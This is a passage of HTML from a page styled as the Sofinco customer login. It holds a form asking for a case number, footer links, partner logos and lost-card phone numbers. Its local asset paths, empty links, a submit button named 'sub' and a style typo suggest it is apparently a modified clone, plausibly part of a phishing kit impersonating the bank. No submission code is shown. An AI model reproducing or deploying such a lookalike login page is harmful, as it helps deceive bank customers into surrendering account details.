									<button data-v-2089dcf0="" type="button" class="input-clear-button" aria-disabled="true"><span data-v-2089dcf0="" class="sr-only">Effacer Numéro de dossier (9 à 11 chiffres)</span></button></div>
                                    <div data-v-2089dcf0="" id="error-message-input" class="error-message">Le numéro de dossier saisie n'est pas valide</div>
                                 </div>
                             
                              <button type="submit" name="sub" class="button partner-background nextButton" id="nextButtonHomePage" form="emailMobileForm" data-elabel="Continuer" style="
    marrgin-t: 25px;
">
                                 <span class="label">Continuer</span><img src="img/arrow-right-white.svg" class="icon" alt="''" aria-hidden="true"><!---->
                              </button>
                              <div data-v-85ae8015="" class="mainWrapper__footer"></div>
							  
                           </form></div>
						    
                           <!---->
                        </div>
                        <div data-v-85ae8015="" class="lightAccess"></div>
                        <!----><!---->
                     </div>
                     <footer data-v-e34bdb22="" data-v-3b99ad3b="" class="footer" role="contentinfo">
                        <ul data-v-e34bdb22="" class="footer__list">
                           <li data-v-e34bdb22="" class="link" tabindex="0" role="link"><a data-v-e34bdb22="" href="" aria-label="shared-components.Footer.link1.ariaLabel">Informations légales</a></li>
                           <li data-v-e34bdb22="" class="link" tabindex="0" role="link"><a data-v-e34bdb22="" href="" aria-label="shared-components.Footer.link2.ariaLabel">Sécurité</a></li>
                           <li data-v-e34bdb22="" class="link" tabindex="0" role="link"><a data-v-e34bdb22="" href="" aria-label="shared-components.Footer.link3.ariaLabel">Tarifs</a></li>
                           <li data-v-e34bdb22="" class="link" tabindex="0" role="link"><a data-v-e34bdb22="" href="" aria-label="shared-components.Footer.link4.ariaLabel">Charte de réclamations</a></li>
                           <li data-v-e34bdb22="" class="link" tabindex="0" role="link"><a data-v-e34bdb22="" href="" aria-label="shared-components.Footer.link5.ariaLabel">Gestion des cookies</a></li>
                           <li data-v-e34bdb22="" class="link" tabindex="0" role="link"><a data-v-e34bdb22="" href="" aria-label="shared-components.Footer.link6.ariaLabel">Accessibilité</a></li>
                        </ul>
                     </footer>
                  </div>
               </div>
               <div data-v-e3c860a7="" data-v-73e178a0="" class="rightContainer withBanner" data-cy="rightContainer">
                  <div data-v-4945b14a="" data-v-e3c860a7="" class="sideBar">
                     <h2 data-v-4945b14a="" class="sideBar__title">Retrouvez dans votre espace Sofinco</h2>
                     <div data-v-4945b14a="" class="sideBar__cards">
                        <div data-v-4945b14a="" class="sideBar__card" data-cy="sidebarCard">
                           <img data-v-4945b14a="" src="img/Icon_Reassurance_Loan.svg" alt="" aria-hidden="true">
                           <p data-v-4945b14a="">Tous vos contrats Sofinco à portée de main et dans un seul espace.</p>
                        </div>
                        <div data-v-4945b14a="" class="sideBar__card" data-cy="sidebarCard">
                           <img data-v-4945b14a="" src="img/Icon_Reassurance_Report.svg" alt="" aria-hidden="true">
                           <p data-v-4945b14a="">La gestion et le suivi de vos contrats et de vos cartes en toute autonomie.</p>
                        </div>
                        <div data-v-4945b14a="" class="sideBar__card" data-cy="sidebarCard">
                           <img data-v-4945b14a="" src="img/Icon_Reassurance_Lock.svg" alt="" aria-hidden="true">
                           <p data-v-4945b14a="">L’accès sécurisé à toutes vos informations personnelles en ligne 24h sur 24, 7 jours sur 7.</p>
                        </div>
                     </div>
                     <h2 data-v-4945b14a="" class="sideBar__title">Sofinco c’est un ensemble d'offres et un réseau de nombreux partenaires :</h2>
                     <div data-v-4945b14a="" class="sideBar__partners">
                        <div data-v-4945b14a="" class="sideBar__partner"><img data-v-4945b14a="" src="img/logo_fnac.svg" alt="Logo Fnac"></div>
                        <div data-v-4945b14a="" class="sideBar__partner"><img data-v-4945b14a="" src="img/logo_darty.svg" alt="Logo Darty"></div>
                        <div data-v-4945b14a="" class="sideBar__partner"><img data-v-4945b14a="" src="img/logo_laredoute.svg" alt="Logo Laredoute"></div>
                        <div data-v-4945b14a="" class="sideBar__partner"><img data-v-4945b14a="" src="img/logo_printemps.svg" alt="Logo Printemps"></div>
                        <div data-v-4945b14a="" class="sideBar__partner"><img data-v-4945b14a="" src="img/logo_lapeyre.png" alt="Logo Lapeyre"></div>
                        <div data-v-4945b14a="" class="sideBar__partner"><img data-v-4945b14a="" src="img/logo_castorama.svg" alt="Logo Castorama"></div>
                     </div>
                  </div>
               </div>
               <div data-v-40c5fe3c="" data-v-226f10e6="" data-v-73e178a0="" id="rightSidebar" class="right-sidebar hide" data-cy="rightSidebar">
                  <div data-v-40c5fe3c="" class="overlay" data-cy="rightSidebarOverlay"></div>
                  <div data-v-40c5fe3c="" class="right-sidebar-container hide" data-cy="rightSidebarContainer">
                     <div data-v-40c5fe3c="" class="right-sidebar-header">
                        <div data-v-40c5fe3c="" class="title-headband">Carte perdue ou volée</div>
                        <button data-v-40c5fe3c="" type="button" class="sidebar__closeBtn" aria-label="Fermer le panneau latéral">
                           <svg data-v-b91f0481="" data-v-40c5fe3c="" xmlns="http://www.w3.org/2000/svg" width="21" height="21" fill="none" viewBox="0 0 21 21" alt="">
                              <path fill="#fff" fill-rule="evenodd" d="M20.743 2.393L19.329.98l-8.486 8.485L2.359.98.944 2.393l8.485 8.486-8.485 8.485 1.414 1.414 8.486-8.485 8.485 8.485 1.414-1.414-8.485-8.485 8.485-8.486z" clip-rule="evenodd" aria-hidden="true" data-v-b91f0481=""></path>
                              <mask id="mbbmzjxbwa" width="21" height="21" x="0" y="0" maskUnits="userSpaceOnUse" data-v-b91f0481="">
                                 <path fill="#fff" fill-rule="evenodd" d="M20.743 2.393L19.329.98l-8.486 8.485L2.359.98.944 2.393l8.485 8.486-8.485 8.485 1.414 1.414 8.486-8.485 8.485 8.485 1.414-1.414-8.485-8.485 8.485-8.486z" clip-rule="evenodd" data-v-b91f0481=""></path>
                              </mask>
                              <g mask="url(#mbbmzjxbwa)" data-v-b91f0481="">
                                 <path class="mask" d="M0.722 1H20.722V21H0.722z" data-v-b91f0481=""></path>
                              </g>
                           </svg>
                           <img data-v-40c5fe3c="" class="sidebar__closeBtn--mobile" src="img/close-mobile.svg" alt="Icône croix extrémités non arrondies">
                        </button>
                     </div>
                     <div data-v-40c5fe3c="" class="right-sidebar-content">
                        <div data-v-226f10e6="" class="right-sidebar-content__summary">
                           <h2 data-v-226f10e6="" class="right-sidebar-content__summary__title">Votre carte a été perdue ou volée ?</h2>
                           <p data-v-226f10e6="" class="right-sidebar-content__summary__text">Pour faire opposition à votre carte bancaire, téléphonez au centre dédié :  (disponible 7 jours/7 et 24 heures/24)</p>
                           <div data-v-226f10e6="" class="right-sidebar-content__phone-blocks">
                              <div data-v-226f10e6="" class="right-sidebar-content__phone-block">
                                 <h3 data-v-226f10e6="" class="right-sidebar-content__phone-block__title">Détenteur d’une Carte Visa</h3>
                                 <p data-v-226f10e6="" class="right-sidebar-content__phone-block__text">Agile, Printemps, Darty</p>
                                 <div data-v-b694f526="" data-v-226f10e6="" class="phone-block"><a data-v-b694f526="" href="tel:+33973323332" tabindex="0" role="link"><span data-v-b694f526="" class="phone-number"><span data-v-b694f526="" class="number-text">0 973 323 332</span><span data-v-b694f526="" class="phone-banner"><span data-v-b694f526="" class="d-block">Numéro</span><span data-v-b694f526="">non surtaxé</span></span></span></a></div>
                              </div>
                              <div data-v-226f10e6="" class="right-sidebar-content__phone-block">
                                 <h3 data-v-226f10e6="" class="right-sidebar-content__phone-block__title">Détenteur d’une Carte Mastercard</h3>
                                 <p data-v-226f10e6="" class="right-sidebar-content__phone-block__text">La Redoute, IKEA, Fnac, Castorama</p>
                                 <div data-v-b694f526="" data-v-226f10e6="" class="phone-block"><a data-v-b694f526="" href="tel:+33973323331" tabindex="0" role="link"><span data-v-b694f526="" class="phone-number"><span data-v-b694f526="" class="number-text">0 973 323 331</span><span data-v-b694f526="" class="phone-banner"><span data-v-b694f526="" class="d-block">Numéro</span><span data-v-b694f526="">non surtaxé</span></span></span></a></div>
                              </div>
                           </div>
                        </div>
                     </div>
                  </div>
               </div>
            </main>
			
         </div>
      </div>
	  
      
   
</body></html>